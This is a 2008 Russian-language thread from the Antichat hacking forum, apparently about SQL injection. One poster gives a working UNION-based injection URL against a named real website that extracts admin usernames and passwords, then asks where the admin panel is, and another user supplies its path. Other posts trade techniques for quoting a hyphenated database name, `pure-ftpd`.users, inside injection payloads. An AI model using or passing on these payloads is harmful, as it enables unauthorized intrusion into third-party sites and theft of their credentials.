
05.01.2008, 00:32
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Блядь ты знак "?" видишь или нет? Мб мне надо скрин своего поста для тебя сделать=\
Сообщение от Spyder
select omfg from pure-ftpd.users
в чём проблема?
Ты сам то походу не далеко ушёл=\
Последний раз редактировалось .Slip; 05.01.2008 в 00:44..
|
|
|

05.01.2008, 04:08
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
Наковырял инж на сайте http://www.ecoaction.com.au/, подобрал таблицы, поля, есть акк админа:
http://www.ecoaction.com.au/content.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(username,';',password),0x71),0x71),5,6,7,8,9,10, 11+FROM+users/*
Вопрос значит такой: а где админка?))).
|
|
|

05.01.2008, 04:17
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
А®ТеS
http://www.ecoaction.com.au/esa
|
|
|

05.01.2008, 14:43
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
вы синтаксиса sql походу вообще не знаете
в запросе после from таблицу надо указывать без ковычек, так как она есть
т е select * from omfg
а не select * from 'omfg', ... `omfg`, ... 0xblablabla, ... char(11,11,11,11,11,11)
и уж самый пиздец вот это
http://forum.antichat.ru/showpost.php?p=547344&postcount=632
|
|
|

05.01.2008, 14:49
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Spyder
вы синтаксиса sql походу вообще не знаете
в запросе после from таблицу надо указывать без ковычек, так как она есть
т е select * from omfg
а не select * from 'omfg', ... `omfg`, ... 0xblablabla, ... char(11,11,11,11,11,11)
и уж самый пиздец вот это
http://forum.antichat.ru/showpost.php?p=547344&postcount=632
если ты про Noiro, то он абсолютно все правильно сказал имена таблиц поидее должны обрамляться в апострофы (обратные кавычки) именно в таких случаях это критично
остальные посты улыбнули
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 05.01.2008 в 14:51..
|
|
|

05.01.2008, 15:15
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
ога, только вот ошибочку то выдаёт
Error: Incorrect table name 'pure-ftpd.users'
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
|
|
|

05.01.2008, 16:35
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Spyder
ога, только вот ошибочку то выдаёт
Error: Incorrect table name 'pure-ftpd.users'
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
так надо обратныйе кавычки урл код которых %60 т.е. запрос будет:
http://site.dmn/script.php?id=1 union select 1 from %60pure-ftpd%60.users/*
и соответственно имя бд отдельно в обратные кавычки брать от .users
__________________
Карфаген должен быть разрушен...
|
|
|

06.01.2008, 11:25
|
|
Познающий
Регистрация: 01.01.2008
Сообщений: 50
С нами:
9662713
Репутация:
71
|
|
Сообщение от Spyder
вы синтаксиса sql походу вообще не знаете
Сообщение от Spyder
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
Сообщение от ISO/IEC 9075:1992, Database Language SQL
Base tables and views are identified by <table name>s. A <table
name> consists of a <schema name> and an <identifier>. For a per-
sistent table, the <schema name> identifies the schema in which
the base table or view identified by the <table name> was de-
fined. Base tables and views defined in different schemas can
have <identifier>s that are equal according to the General Rules
of Subclause 8.2, "<comparison predicate>".
If a reference to a <table name> does not explicitly contain a
<schema name>, then a specific <schema name> is implied. The par-
ticular <schema name> associated with such a <table name> depends
on the context in which the <table name> appears and is governed
by the rules for <qualified name>. The default schema for <prepara-
ble statement>s that are dynamically prepared in the current SQL-
session through the execution of <prepare statement>s and <execute
immediate statement>s is initially implementation-defined but may
be changed by the use of <set schema statement>s.

|
|
|

05.01.2008, 16:49
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
впишусь пожалуй в вашу тему, причем тут кавычки, если в посте с вопросом ясно написано, что мешает "-" в "pure-ftpd.users"? и еще, ссылку кидали на сайт, или мы вслепую помогаем?
|
|
|

05.01.2008, 16:58
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
2Ded MustD!e, да не стоит вписываться, все уже давно решено, я общался с Piflit`ом по осеку и все прокатило, объясняю как я сам это все понимаю, pure-ftpd здесь воспринимается как выражение а не название таблицы т.е. есть оператор минус, поэтому ошибка и выдается, если ты пишешь `pure-ftpd`.users , то одназначно указываешь мускулу, что pure-ftpd - это имя БД а не операция
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 05.01.2008 в 17:02..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|